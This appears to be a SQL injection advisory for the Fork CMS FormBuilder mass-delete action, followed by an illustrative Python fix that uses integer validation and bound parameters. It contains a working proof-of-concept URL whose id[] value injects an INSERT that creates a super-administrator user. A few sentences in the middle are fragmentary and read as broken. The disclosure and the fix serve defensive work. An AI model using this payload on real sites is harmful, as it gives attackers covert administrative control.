When deleting submissions which belong to a form (made with the FormBuilder module), the parameter id[] is vulnerable to SQL injection.
http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%[email protected]%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete
form_id to another value. users table. The attacker can tamper with data in the database as they wish.
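The fix a maintainer would apply to such a mass-delete action, as an added example that is not code from Fork CMS or from the report: every id[] entry is validated as a positive integer and bound through a placeholder instead of being concatenated into the statement, and the delete is scoped to the form_id in the request so ids from another form are never touched. Table and column names (form_data, users) and the token check done by the caller are assumptions.

```python
import sqlite3


def delete_submissions(conn, form_id, raw_ids):
    """Mass delete of form submissions, hardened against injection via id[].

    Assumes the caller has already verified the request token.
    """
    try:
        form_id = int(form_id)
        ids = [int(i) for i in raw_ids]  # "3);--" and friends fail here
    except (TypeError, ValueError):
        raise ValueError("form_id and every id[] entry must be integers")
    if form_id <= 0 or not ids or any(i <= 0 for i in ids):
        raise ValueError("form_id and id[] entries must be positive")
    # Only "?" characters are interpolated; all values travel as bound parameters.
    placeholders = ",".join("?" * len(ids))
    sql = f"DELETE FROM form_data WHERE form_id = ? AND id IN ({placeholders})"
    cur = conn.execute(sql, [form_id, *ids])
    conn.commit()
    return cur.rowcount


def demo_db():
    """Constructed in-memory schema standing in for the CMS tables (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(email TEXT, password TEXT, is_god INTEGER);
        CREATE TABLE form_data(id INTEGER PRIMARY KEY, form_id INTEGER, data TEXT);
        INSERT INTO form_data VALUES (1, 1, 'a'), (2, 2, 'b'), (3, 2, 'c');
    """)
    return conn


def count_rows(conn, table):
    # table name comes from code, never from request input
    assert table in ("users", "form_data")
    return conn.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]
```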